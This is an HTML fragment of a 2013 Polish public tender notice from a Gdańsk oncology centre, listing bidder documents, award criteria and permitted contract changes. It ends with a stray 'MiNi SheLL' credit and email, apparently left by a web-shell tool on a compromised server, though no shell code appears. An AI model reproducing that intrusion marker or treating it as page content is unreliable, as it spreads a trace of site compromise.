<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Wypełniony Formularz oferty-  zał. nr 1 do SIWZ.
2.	Wstępny Harmonogram rzeczowo-finansowy realizacji inwestycji    -   zał. nr 13 do SIWZ
3.	Zaakceptowany wzór umowy - zał. nr 14 do SIWZ.
4.	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że oferowane produkty odpowiadają określonym normom lub specyfikacjom technicznym 
5.	 Zestawienie materiałów budowlanych   -  zał. nr 15 do SIWZ</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (jeżeli dotyczy).
2.	Pełnomocnictwo potwierdzające posiadanie uprawnień osoby-osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
3.	Oświadczenie o korzystaniu z podwykonawców - zał. nr 7 do SIWZ.
4.	W przypadku spółki cywilnej - pisemne pełnomocnictwo uprawniające jednego ze wspólników do występowania w imieniu wszystkich wspólników w przeprowadzonym postępowaniu
5.	W przypadku konsorcjum - należy podać informacje o wszystkich podmiotach wchodzących w skład konsorcjum i załączyć dokument, w który wszyscy wykonawcy wchodzący w skład konsorcjum ustanawiają pełnomocnika do reprezentacji.
6.	Dowód wniesienia wadium - zgodnie z treścią pkt. IX niniejszej SIWZ 
7.	Kosztorys ofertowy - sporządzony na podstawie przedmiaru robót (kosztorys jest w tym przypadku wyłącznie dokumentem pomocniczym, nie podlegający ocenie przez Zamawiającego); powinien on uwzględnić wszystkie pozycje przedmiaru, jednak wystąpienie jakichkolwiek rozbieżności pomiędzy kosztorysem ofertowym a przedmiarem robót oraz pominięcie pozycji, nie będą miały wpływu na prawidłowość obliczonej ceny oferty.
       Dokumenty mogą być przedstawione w formie oryginału lub kserokopii 
       poświadczonej na każdej stronie za zgodność z oryginałem przez Wykonawcę (poświadczenia
      zgodności musi dokonać osoba upoważniona do reprezentowania Wykonawcy). 

 Dokumenty stanowiące załączniki wymagane przez SIWZ powinny zostać wypełnione przez Wykonawcę bez  wyjątku i ściśle wg. warunków i postanowień zawartych w SIWZ - bez dokonywania w nich zmian. 

8. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy ustawy i postanowienia SIWZ dotyczące Wykonawcy, stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia, ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.

9. Za osobę-osoby uprawnioną do reprezentowania Wykonawcy w przypadku, gdy samodzielnie ubiega się o udzielenie zamówienia, uważa się:
osoby wymienione w KRS jako uprawnione do reprezentacji 
osoby wymienione w Zaświadczeniu o wpisie do ewidencji działalności gospodarczej
inne osoby, o ile posiadają stosowne upoważnienia (pełnomocnictwo)
10. Za osobę-osoby uprawnioną do reprezentowania Wykonawcy w przypadku, gdy Wykonawcy wspólnie ubiegają  się o udzielenie zamówienia, uważa się:
właściwie umocowanego wspólnika
działających łącznie reprezentantów wszystkich Wykonawców</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zamawiający przewiduje możliwość wprowadzenia następujących zmian do umowy:
     
  jeżeli ze względów technologicznych nie będzie możliwe zachowanie terminu wykonania zamówienia, może być on przedłużony za zgodą Zamawiającego
  2)	jeżeli z powodu działania siły wyższej nie będzie możliwe zachowanie terminu wykonania zamówienia, może być on przedłużony za zgodą Zamawiającego np. klęski żywiołowe, strajki, działania wojenne
  3)	możliwość wprowadzenia innych rozwiązań technologicznych usprawniających wykonanie przedmiotu zamówienia ze względów technicznych lub finansowych z zastrzeżeniem, ze zmiany nie mają istotnego wpływu na pierwotne warunki udziału w postępowaniu oraz na pierwotny przedmiot zamówienia określony w SIWZ. Niniejsza zmiana musi być zaakceptowana przez Zamawiającego i Wykonawcę
  4) w toku realizacji umowy możliwa jest zmiana podwykonawców wyłącznie za zgodą Zamawiającego wyrażoną w formie pisemnej (głownie ze względów losowych np. zgon, choroba)
  5)	możliwość przedłużenia terminów płatności ze względów proceduralnych, dotyczących rozliczania inwestycji finansowanych .
     6)	zmiany wynagrodzenia w przypadku ustawowej zmiany stawki podatku VAT
 7) 	zmiany organizacyjnej Zamawiającego istotnej dla realizacji niniejszej umowy
 8)	zmiany formy prawnej prowadzonej działalności gospodarczej 
 9)    zmiany wskaźnika cen produkcji budowlano-montażowej, ogłoszonego przez prezesa GUS
10)	zmiany adresu siedziby firmy oraz siedziby serwisu i zmianie adresu zamieszkania właściciela lub współwłaściciela firmy
   11)  zmiany uwarunkowań prawnych i formalnych realizacji umowy spowodowanych działaniem osób trzecich
        (np. wstrzymanie prac budowlanych przez właściwy organ z przyczyn niezawinionych przez wykonawcę)
12) zmiany organizacyjnej Zamawiającego  istotnej dla realizacji niniejszej umowy
13) inne okoliczności nie powstałe z winy wykonawcy
14) zmiana terminu realizacji w zw. z koniecznością wprowadzenia zmian w dokumentacji projektowej
    15) zmiana umowy w zw. z możliwością ograniczenia zakresu rzeczowego przedmiotu zamówienia (roboty
     zaniechane) w sytuacji, gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z
     zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu
     zamówienia . Zasady rozliczania tych robót będą następujące: 1) w przypadku odstąpienia od całego elementu
     robót określonego w kosztorysie ofertowym nastąpi odliczenie wartości tego elementu, określonej w tym 
     kosztorysie, od ogólnej wartości przedmiotu umowy, 2) w przypadku odstąpienia od części robót z danego
     elementu określonego w kosztorysie ofertowym obliczenie niewykonanej części tego elementu nastąpi na
    podstawie kosztorysu przygotowanego przez wykonawcę, a zatwierdzonego przez zamawiającego.                                                                                                16) Zamawiający dopuszcza wprowadzenie zmiany materiałów i urządzeń przedstawionych w ofercie 
      przetargowej pod warunkiem, że zmiany te będą korzystne dla zamawiającego. Będą to np. okoliczności: 1) 
      powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatację i konserwację wykonanego
      przedmiotu zamówienia, 2) powodujące poprawienie parametrów technicznych, 3) wynikające z aktualizacji 
      rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów. Dodatkowo możliwa jest 
      zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej pod
      warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.
 17) przedłużenie się procedury udzielania zamówienia poprzez zastosowanie środków ochrony prawnej przez 
      Wykonawcę, przy jednoczesnym określeniu datą terminu zakończenia przedmiotu umowy
 18) rozszerzenie odpowiedzialności z tytułu rękojmi oraz przedłużenia terminu udzielonej gwarancji


1)   Dopuszczalne są  wszelkie zmiany nieistotne, rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o udzielenie zamówienia nie wpłynęła by na krąg podmiotów ubiegających się o udzielenie zamówienia ani na wynik postępowania, m.in.:
 -  zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy
 -  zmiany dotyczące nazwy, siedziby lub formy organizacyjno-prawnej Wykonawcy w trakcie trwania umowy, nr  kont bankowych oraz innych danych identyfikacyjnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wco.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzkie Centrum Onkologii SP ZOZ, 
        80-210 Gdańsk, ul. M.Skłodowskiej-Curie 2, pokój nr 35 Komórka Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2013 godzina 12:45, miejsce: Wojewódzkie Centrum Onkologii SP ZOZ, 
        80-210 Gdańsk, ul. M.Skłodowskiej-Curie 2, pokój nr 39 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Cenę oferty należy podać w formie ryczałtu -  ten rodzaj wynagrodzenia określony jest w art. 632 Kodeksu Cywilnego, który brzmi następująco: 
 Jeżeli strony umówiły się o wynagrodzenie ryczałtowe, przyjmujący zamówienie nie może żądać podwyższenia wynagrodzenia, chociażby w czasie zawarcia umowy nie można było przewidzieć rozmiaru prac.

 Jeżeli jednak wskutek zmiany stosunków, której nie można było przewidzieć, wykonanie dzieła groziłoby przyjmującemu zamówienie rażącą stratą, sąd może podwyższyć ryczałt lub rozwiązać umowę.

2)Cena oferty musi zawierać wszelkie koszty niezbędne do zrealizowania zamówienia wynikające wprost z dokumentacji projektowo-kosztorysowej, jak również w niej nie ujęte, a bez których nie można wykonać zamówienia. Będą to m.in. koszty:
 wszelkich robot przygotowawczych
 prac porządkowych
 zagospodarowania placu budowy
 utrzymania zaplecza budowy
 wywozu i utylizacji odpadów na legalnym wysypisku odpadów
 dozorowania budowy
 sporządzenia planu BIOZ (bezpieczeństwa i ochrony zdrowia)
 projektu organizacji robót
 innych czynności niezbędnych do wykonania przedmiotu zamówienia

Skutki finansowe jakichkolwiek błędów w dokumentacji projektowej obciążają Wykonawcę, a zatem musi on przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia. 
Wymaga się, aby Wynagrodzenie ryczałtowe było tak skalkulowane, żeby w przypadku pojawienia się konieczności realizacji robót dodatkowych, wykonawca był w stanie je wykonać w pierwotnej cenie oferty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com